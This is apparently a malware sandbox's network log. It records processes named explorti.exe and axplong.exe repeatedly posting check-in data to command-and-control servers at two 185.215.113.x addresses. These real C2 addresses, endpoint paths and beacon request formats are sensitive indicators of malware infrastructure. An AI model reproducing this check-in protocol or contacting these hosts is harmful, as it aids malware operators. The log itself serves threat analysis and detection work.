Jul 26, 2024 20:10:27.175061941 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:27.422683001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	64057	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:26.814757109 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:27.566219091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:27.570333004 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:27.817024946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	64067	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:27.544208050 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:28.341789007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:28.342778921 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:28.593261003 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	64072	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:27.979758978 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:28.739123106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:28.747410059 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:29.015259981 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	64079	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:28.754050970 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:29.623313904 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:29.698126078 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:29.945478916 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	64080	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:29.141781092 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:29.917551994 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:29.930056095 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:30.181438923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	64082	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:30.184067965 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:30.935235023 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:30.936081886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:31.196810961 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	64083	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:30.307199001 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:31.106653929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:31.107336998 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:31.509020090 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	64085	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:31.389653921 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:32.229224920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:32.235127926 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:32.507096052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	64086	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:31.631113052 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:32.415118933 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:32.424344063 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:32.673836946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	64089	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:32.626952887 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:33.438209057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:33.438894987 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:33.716564894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	64090	185.215.113.19	80	7656	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:32.812750101 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:33.563150883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:33.609168053 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 20:10:33.858541965 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	64092	185.215.113.16	80	7648	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:10:33.837352037 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:10:34.607733965 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:10:34.610148907 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:10:34.862114906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:10:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
